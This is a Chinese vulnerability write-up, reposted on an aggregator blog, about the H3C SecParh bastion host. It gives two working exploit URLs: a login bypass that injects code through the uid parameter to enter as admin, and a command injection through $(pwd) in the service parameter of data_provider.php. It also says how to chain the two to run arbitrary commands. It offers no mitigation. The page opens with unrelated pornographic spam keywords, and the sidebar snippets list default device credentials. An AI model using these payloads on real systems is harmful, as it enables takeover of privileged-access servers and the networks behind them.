国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

  1. Toy模板網(wǎng)首頁
  2. >Toy博客

H3C SecParh堡壘機(jī)任意用戶登錄與遠(yuǎn)程執(zhí)行代碼漏洞

2年前作者:剁椒魚頭沒剁椒分類:Toy博客閱讀(20)違法舉報

這篇具有很好參考價值的文章主要介紹了H3C SecParh堡壘機(jī)任意用戶登錄與遠(yuǎn)程執(zhí)行代碼漏洞。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

1.H3C SecParh堡壘機(jī)任意用戶登錄漏洞

1.1.漏洞描述

??在H3C SecParh堡壘機(jī) get_detail_view.php 存在任意用戶登錄漏洞。

1.2.漏洞影響

??H3C SecParh堡壘機(jī)

1.3.漏洞復(fù)現(xiàn)

1.3.1.登錄頁面

??該漏洞版本的登錄頁面如下,2018年的。
H3C SecParh堡壘機(jī)任意用戶登錄與遠(yuǎn)程執(zhí)行代碼漏洞

1.3.2.構(gòu)建URL

URL:https://IP地址:端口//audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin

H3C SecParh堡壘機(jī)任意用戶登錄與遠(yuǎn)程執(zhí)行代碼漏洞

1.4.總結(jié)

??這里確實成功登錄上去了,若設(shè)定三權(quán)的話,可能存在把a(bǔ)dmin用戶設(shè)定為類似與這里的審計管理員,那么就需要測試是否能夠跳轉(zhuǎn)到操作管理員或者其它的一些管理員賬號上去。這里就不再深入測試,只是提供一個思路。

2.H3C SecParh堡壘機(jī)遠(yuǎn)程命令執(zhí)行漏洞

2.1.漏洞描述

??H3C SecParh堡壘機(jī)data_provider.php存在遠(yuǎn)程命令執(zhí)行漏洞,攻擊者通過任意用戶登錄或者賬號密碼進(jìn)入后臺就可以構(gòu)造特殊的請求執(zhí)行命令。

2.2.漏洞影響

??H3C SecParh堡壘機(jī)

2.3.漏洞復(fù)現(xiàn)

2.3.1.登錄頁面

??該漏洞版本的登錄頁面如下,2018年的。
H3C SecParh堡壘機(jī)任意用戶登錄與遠(yuǎn)程執(zhí)行代碼漏洞

2.3.2.構(gòu)建URL

URL:https://IP地址:端口/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(pwd)&identity_cond=&query_type=all&format=json&browse=true

??需要注意一定要通過先通過任意用戶登錄獲取Cookie,然后在URL中service后面的括號中輸入想要執(zhí)行的命令,即可實現(xiàn)遠(yuǎn)程命令執(zhí)行。
H3C SecParh堡壘機(jī)任意用戶登錄與遠(yuǎn)程執(zhí)行代碼漏洞

2.4.總結(jié)

??我使用火狐瀏覽器,我訪問后就自動將信息進(jìn)行下載,不過也有瀏覽器直接跳轉(zhuǎn)界面的也行,都能夠看到。文章來源地址http://www.zghlxwxcb.cn/news/detail-448558.html

到了這里,關(guān)于H3C SecParh堡壘機(jī)任意用戶登錄與遠(yuǎn)程執(zhí)行代碼漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進(jìn)行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • H3C 遠(yuǎn)程登陸 telnet ssh 訪問web

    H3C 遠(yuǎn)程登陸 telnet ssh 訪問web

    客戶要求:路由器R1可以通過telnet訪問路由器R2 用戶名:xuyue 密碼:abc123456789 Telnet的端口是23 1.配置ip地址 2.開啟telnet服務(wù) 3.創(chuàng)建用戶名xuyue ,simple加密 創(chuàng)建密碼,開啟telnet服務(wù) 4.驗證方式 5.在r1上配置接口ip地址 方法:H3C上開啟telnet功能,創(chuàng)建登錄用戶,設(shè)置登錄密碼,設(shè)置

    2024年02月10日
    瀏覽(24)
  • 如何在vmware上部署H3C CAS平臺并成功登錄

    如何在vmware上部署H3C CAS平臺并成功登錄

    最近入職云部門,要學(xué)習(xí)一些H3C平臺的東西,熟悉些平臺用法,但是我自己肯定是沒有硬件(服務(wù)器)的,就只有通過虛擬機(jī)去裝CAS了。搞了好多天,查了不少資料,算是解決了問題裝上了,下面是我的安裝方法。 1.下載。 登錄h3c官網(wǎng),支持,軟件下載,云計算,H3Cloud 虛擬

    2023年04月09日
    瀏覽(19)

  • H3C交換機(jī)限制遠(yuǎn)程(HTTP、HTTPS、Telnet、SSH)登陸

    1.需求: 基于網(wǎng)絡(luò)安全因素,對局域網(wǎng)網(wǎng)絡(luò)設(shè)備遠(yuǎn)程登陸(包括HTTP、HTTPS、Telnet、SSH)進(jìn)行限制,只允許運(yùn)維IP訪問。 2.配置: 以H3C S5110V2(V5)及S5120V2(V7)交換機(jī)為例 創(chuàng)建ACL(為通用配置) [SW]acl number 2000 [SW-acl-basic-2000]rule 1 permit source 10.22.210.89 0 [SW-acl-basic-2000]rule 99 den

    2024年02月07日
    瀏覽(24)
  • 【H3C】配置AAA認(rèn)證和Telnet遠(yuǎn)程登陸,S5130 Series交換機(jī)

    【H3C】配置AAA認(rèn)證和Telnet遠(yuǎn)程登陸,S5130 Series交換機(jī)

    ?AAA配置步驟為: 1.開啟telent遠(yuǎn)程登陸服務(wù) 2.創(chuàng)建用戶,設(shè)置用戶名、密碼、用戶的服務(wù)類型 3.配置終端登錄的數(shù)量 4.配置vlan-if的ip地址,用來遠(yuǎn)程登陸 5.允許對應(yīng)的vlan通過 1.開啟telent遠(yuǎn)程登陸服務(wù) sys? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? # 進(jìn)入系統(tǒng)視圖 te

    2024年01月22日
    瀏覽(24)
  • 華三H3C交換機(jī)配置端口鏡像之如何配置本地端口鏡像和遠(yuǎn)程端口鏡像(可適用一個源端口鏡像給多目的端口時)

    華三H3C交換機(jī)配置端口鏡像之如何配置本地端口鏡像和遠(yuǎn)程端口鏡像(可適用一個源端口鏡像給多目的端口時)

    如何在華三交換機(jī)配置本地端口鏡像和遠(yuǎn)程端口鏡像 在平時的工作中,經(jīng)常需要通過日志審計設(shè)備/行為管理設(shè)備/流量分析系統(tǒng)設(shè)備,對網(wǎng)絡(luò)設(shè)備上的報文流量進(jìn)行分析,以了解整個網(wǎng)絡(luò)的運(yùn)行情況,這時就需要通過端口鏡像的技術(shù)通過把源端口的流量復(fù)制一份到目的觀察端

    2023年04月22日
    瀏覽(27)

  • H3C交換機(jī)怎么切蒂刪除H3C交換機(jī)VLAN?

    H3C交換機(jī)如何刪除VLAN,如果直接使用“undo vlan”是刪不干凈的,因為配置VLAN時還配置過接口,下面就由小編介紹下具體操作吧 1、首先通過console口或telnet連接三層交換機(jī),進(jìn)入用戶視圖模式”“,如圖所示: 2、在用戶模式下輸入”sys“進(jìn)入系統(tǒng)視圖模式”[H3C]“,如圖所示

    2024年02月08日
    瀏覽(20)
  • H3C服務(wù)器帶外默認(rèn)賬號和密碼,H3C產(chǎn)品的默認(rèn)密碼是多少?

    H3C服務(wù)器帶外默認(rèn)賬號和密碼,H3C產(chǎn)品的默認(rèn)密碼是多少?

    H3C設(shè)備采用出廠配置啟動時,通過Console口登錄時認(rèn)證方式為scheme,用戶名和密碼均為admin;設(shè)備采用空配置啟動時,通過Console口登錄時認(rèn)證方式為none,可直接登錄。登錄成功之后用戶角色為network-admin AP設(shè)備,在AP上開啟允許TELNET登錄時,telnet的密碼是h3capadmin ? H3C服務(wù)器產(chǎn)品

    2024年02月07日
    瀏覽(29)
  • H3C 綜合實驗

    H3C 綜合實驗

    設(shè)備改名 按照圖示要求將其中設(shè)備改名,交換機(jī)sw111-sw555,路由器r1-r5 IP地址分配 按圖示要求,將計算機(jī)設(shè)備及路由相應(yīng)端口設(shè)置IP地址 鏈路聚合 在sw111和sw222之間的G1/0/1-2接口設(shè)置鏈路聚合,聚合鏈路編號為1,工作模式為trunk VLAN 在sw111、sw222上創(chuàng)建vlan 10、20,將G1/0/3置于v

    2024年02月07日
    瀏覽(27)
  • H3C無線配置

    H3C無線配置

    一、拓?fù)?簡介: HCL版本:V5.7.1,模擬器AC及交換機(jī)系統(tǒng)版本:V7 二、配置步驟: 配置設(shè)備間基本鏈路及IP路由、vlan、等,保障交換機(jī)和AC之間二層或者三層互通。 配置AP上線。 配置兩個服務(wù)模板。(一個用vlan100,另一個用vlan200) *服務(wù)模板概念簡介:定義一個包含了WiFi的

    2024年02月16日
    瀏覽(21)

  • 思科,華三,H3C命令

    取消/關(guān)閉 當(dāng)前設(shè)置 思科:no? 華為:undo? h3c:undo 查看、顯示 思科:show? 華為:display? h3c:display 退回上級 思科:exit? 華為:quit? h3c:quit 設(shè)置主機(jī)名 思科:hostname? 華為:sysname? h3c:sysname 進(jìn)入全局模式 思科:en,?config?terminal? 華為:system-view? h3c:system-view 刪除文件 思科:delete? 華為:del

    2024年02月03日
    瀏覽(25)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包